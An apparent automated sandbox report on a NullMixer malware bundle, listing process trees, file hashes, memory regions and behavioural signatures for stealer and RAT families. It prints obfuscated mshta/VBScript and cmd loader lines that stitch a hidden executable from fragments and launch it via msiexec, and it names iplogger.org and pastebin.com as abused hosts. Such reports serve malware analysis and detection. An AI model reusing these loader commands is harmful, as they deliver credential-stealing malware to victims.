C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe
Wed062a0488e6dd1.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe
Wed0625413f2fb.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe
Wed067fa7edd4b875a.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe
Wed068cfd71e196da.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe
Wed06d8092a5ae.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe
Wed06dffacb42ccf1c.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe
Wed0639114ac9fa.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe
Wed06384ea2548.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe
Wed062272ee8a02b1746.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 272
C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7011C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF """"=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe
"C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp" /SL5="$4020C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"
C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe
05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /im "Wed062272ee8a02b1746.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct( "WSCrIpT.ShELl").RuN ("cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h""=="""" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " ,0,true ))
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe&&stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h&IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h"=="" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT( "wScriPT.shEll" ). Run("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n " ,0, TrUe))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS+ ZSPELY.cNM + OJM3YR.X+ SVnzW.C2+ AmtZY.zXT+ LPME79O.f1+ NytFSko.4 m9WDKH25.n &STart msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Echo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"
C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\M9WDkH25.n
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 456
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe
Network
Files
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2804-61-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS028D4896\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/300-191-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-182-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-194-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2632-195-0x0000000002A00000-0x0000000002AA7000-memory.dmp
memory/300-192-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2632-197-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/2632-199-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/2632-196-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/300-188-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-186-0x0000000000400000-0x0000000000422000-memory.dmp
memory/300-184-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2804-208-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2804-207-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2804-206-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2804-204-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2804-201-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2804-200-0x0000000000400000-0x000000000051C000-memory.dmp
memory/980-221-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-219-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-217-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/980-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/980-213-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1644-223-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1612-224-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2876-222-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/980-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2632-226-0x00000000009F0000-0x0000000000B4D000-memory.dmp
memory/2632-233-0x0000000002AB0000-0x0000000002B44000-memory.dmp
memory/2632-235-0x0000000000800000-0x000000000088D000-memory.dmp
Analysis: behavioral26
Detonation Overview
| Submitted | 2024-11-10 17:24 |
| Reported | 2024-11-10 17:27 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 150s |
| Max time network | 156s |
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4956 set thread context of 1668 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe |
| PID 2480 set thread context of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe |
| PID 4840 set thread context of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133757331646796819" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
